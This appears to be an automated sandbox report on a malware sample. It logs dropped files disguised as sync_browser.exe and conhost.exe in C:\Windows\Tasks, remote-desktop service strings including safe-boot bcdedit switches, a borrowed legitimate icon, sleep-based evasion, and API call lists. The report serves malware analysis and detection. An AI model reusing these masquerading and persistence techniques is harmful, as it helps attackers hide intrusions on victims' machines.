Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sync_browser.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\conhost.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\gTFLK1.jBd3Ei	Jump to dropped file
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R	Jump to dropped file
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	File created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\GIjul8.QTIrrr	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\gTFLK1.jBd3Ei	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\Tasks\sdABZ4.E1924R	Jump to dropped file

Source: GIjul8.QTIrrr.3.dr	Binary or memory string: bcdedit.exe
Source: GIjul8.QTIrrr.3.dr	Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: sync_browser.exe.7.dr	Binary or memory string: bcdedit.exe
Source: sync_browser.exe.7.dr	Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: GIjul8.QTIrrr.0.dr	Binary or memory string: bcdedit.exe
Source: GIjul8.QTIrrr.0.dr	Binary or memory string: WTSGetActiveConsoleSessionIdkernel32WTSQueryUserTokenWtsapi32.dllWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%d_runservice_commandline -service_runSeTcbPrivilegewinlogon.exeWTSEnumerateProcessesAwtsapi32WTSFreeMemoryWinsta0\Winlogonwinsta.dlluser32.dllWinStationConnectWLockWorkStationGlobal\SessionEventUltraHost name unavailableIP address unavailable%d., Global\SessionEventUltraCadsas.dllSendSAScad.exeWTSEnumerateSessionsAConsoleLockWorkstation failed with error 0x%0XRegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootSOFTWARE\Microsoft\Windows\CurrentVersion\PoliciesSystemSoftwareSASGeneration-delsoftwarecad-softwarecadding_dong.wavRICHED32.DLL------------------------------------------------------------------------------------------------------------------------

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5987EB0 GetPrivateProfileIntA,	21_2_00007FF7D5987EB0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5987650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,	21_2_00007FF7D5987650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5987E10 GetPrivateProfileIntA,	21_2_00007FF7D5987E10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5987D50 GetPrivateProfileIntA,	21_2_00007FF7D5987D50
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59878E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,	21_2_00007FF7D59878E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59877F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,	21_2_00007FF7D59877F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5987750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,	21_2_00007FF7D5987750
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5987F50 GetPrivateProfileIntA,	21_2_00007FF7D5987F50
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5989A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,	21_2_00007FF7D5989A40
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D593E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat	21_2_00007FF7D593E1D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59381AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin	21_2_00007FF7D59381AD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5987C90 GetPrivateProfileIntA,	21_2_00007FF7D5987C90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5987BD0 GetPrivateProfileIntA,	21_2_00007FF7D5987BD0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5987EB0 GetPrivateProfileIntA,	26_2_00007FF7D5987EB0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5987650 GetPrivateProfileIntA,RegCreateKeyExA,RegCreateKeyExA,	26_2_00007FF7D5987650
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5987E10 GetPrivateProfileIntA,	26_2_00007FF7D5987E10
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5987D50 GetPrivateProfileIntA,	26_2_00007FF7D5987D50
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59878E0 GetPrivateProfileIntA,RegQueryValueExA,RegQueryValueExA,GetPrivateProfileStringA,	26_2_00007FF7D59878E0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59877F0 GetPrivateProfileIntA,RegQueryValueExA,GetPrivateProfileIntA,	26_2_00007FF7D59877F0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5987750 GetPrivateProfileIntA,RegCloseKey,RegCloseKey,RegCloseKey,	26_2_00007FF7D5987750
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5987F50 GetPrivateProfileIntA,	26_2_00007FF7D5987F50
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5989A40 GetPrivateProfileIntA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetPrivateProfileIntA,	26_2_00007FF7D5989A40
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D593E1D0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,_itow,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivat	26_2_00007FF7D593E1D0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59381AD GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileStructA,WritePrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStrin	26_2_00007FF7D59381AD
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5987C90 GetPrivateProfileIntA,	26_2_00007FF7D5987C90
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D5987BD0 GetPrivateProfileIntA,	26_2_00007FF7D5987BD0

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Tasks\5482310161066753

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (98).png

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59648B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,		21_2_00007FF7D59648B0
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 26_2_00007FF7D59648B0 IsIconic,IsWindowVisible,GetWindowRect,SHAppBarMessage,		26_2_00007FF7D59648B0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 21_2_00007FF7D5963E20 OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,SetThreadDesktop,LoadLibraryA,GetProcAddress,GetStockObject,RegisterClassExA,SetEvent,CreateWindowExA,SetTimer,SetWindowLongPtrA,SetClipboardViewer,CreateThread,CloseHandle,GetModuleFileNameA,GetModuleFileNameA,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetEvent,PeekMessageA,Sleep,CreateRectRgn,CombineRgn,DeleteObject,free,SetEvent,SetEvent,SetEvent,TranslateMessage,DispatchMessageA,WaitMessage,DestroyWindow,DestroyWindow,SetEvent,KillTimer,FreeLibrary,FreeLibrary,FreeLibrary,SetThreadDesktop,CloseDesktop,

21_2_00007FF7D5963E20

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Tasks\sync_browser.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Tasks\sync_browser.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\Tasks\sync_browser.exe

21_2_00007FF7D5999BC0

Source: C:\Windows\Tasks\sync_browser.exe	Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,		21_2_00007FF7D5939D00
Source: C:\Windows\Tasks\sync_browser.exe	Code function: OpenSCManagerA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,OpenServiceA,QueryServiceConfigA,GetLastError,QueryServiceConfigA,CloseServiceHandle,CloseServiceHandle,		26_2_00007FF7D5939D00

Source: C:\Windows\Tasks\sync_browser.exe	Window / User API: threadDelayed 512
Source: C:\Windows\SysWOW64\timeout.exe	Window / User API: threadDelayed 367

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\Tasks\sdABZ4.E1924R	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Windows\Tasks\conhost.exe	Jump to dropped file

Source: C:\Windows\Tasks\sync_browser.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_21-22501

Source: C:\Windows\Tasks\sync_browser.exe	API coverage: 3.5 %
Source: C:\Windows\Tasks\sync_browser.exe	API coverage: 1.2 %

Source: C:\Windows\Tasks\sync_browser.exe TID: 8268	Thread sleep time: -51200s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7308	Thread sleep count: 54 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8284	Thread sleep count: 34 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8440	Thread sleep count: 367 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8440	Thread sleep time: -36700s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Code function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	0_2_00403387
Source: C:\Users\user\Desktop\Olz7TmvkEW.exe	Code function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	0_2_00402EE6
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5956DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	21_2_00007FF7D5956DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D5935910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	21_2_00007FF7D5935910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 21_2_00007FF7D59EA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	21_2_00007FF7D59EA228
